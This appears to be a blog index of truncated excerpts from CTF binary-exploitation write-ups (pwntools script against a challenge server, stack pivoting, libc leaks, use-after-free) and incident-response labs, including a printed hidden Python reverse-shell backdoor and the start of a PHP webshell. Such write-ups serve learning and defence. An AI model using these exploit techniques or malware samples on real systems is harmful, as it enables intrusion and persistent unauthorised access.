heackmyvmRegistry
program bamuwe@bamuwe:~$ checksec program [*] '/program' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PI...
program bamuwe@bamuwe:~$ checksec program [*] '/program' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PI...
from pwn import * #context.log_level='debug' Lib = ELF('./glibc/libc.so.6') elf = ELF('./rocket_blaster_xxx') #io = process('./rocket_blaster_xxx') io = remote('83.136.254.221',56354) #io = gdb.deb...
栈迁移 one-gadgets 64泄露libc 在read函数中存在变量buf的溢出,但是长度受到了限制,只能溢出两个栈空间 在后面可以往&bank写入内容,而&bank正好位于.bss段上,可以写入且内存中位置不会改变 没有后门函数,考虑泄露libc,因为溢出空间有限,所以采用one-gadget这样只要溢出两个空间就可以拿到shell ...
[*] '/home/bamuwe/fastfastfast/vuln' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x3fd000) $ checksec ./...
int __fastcall main(int argc, const char **argv, const char **envp) { char buf[10]; // [rsp+6h] [rbp-Ah] BYREF setbuf(stdin, 0LL); setbuf(stderr, 0LL); setbuf(stdout, 0LL); mprotect((&am...
流量特征分析-小王公司收到的钓鱼邮件 一,下载数据包文件 hacker1.pacapng,分析恶意程序访问了内嵌 URL 获取了 zip 压缩包,该 URL 是什么将该 URL作为 FLAG 提交 FLAG(形式:flag{xxxx.co.xxxx/w0ks//?YO=xxxxxxx}) (无需 http、https); 找到压缩包流量 flag{http://tsdan...
权限维持-linux权限维持-隐藏 一,黑客隐藏的隐藏的文件 完整路径md5 发现/tmp下存在可疑的.temp文件 #!/usr/bin/python3 import socket,subprocess,os,sys, time pidrg = os.fork() if pidrg > 0: sys.exit(0) os.chdir("/") os.set...
第一章 应急响应-webshell查杀 查杀方法1:d盾查杀 查杀方法2:grep -nr “eval” .` 一,黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx} <?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode...
UAF UAF leak_libc leak_heap_base 指针加密 unsortedbin one_gadget [*] '/home/bamuwe/duck/pwn' Arch: amd64-64-little RELRO: Full RELRO Sta...
[NISACTF 2022]UAF pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=85bd87e16a35c0c05064a1a0938...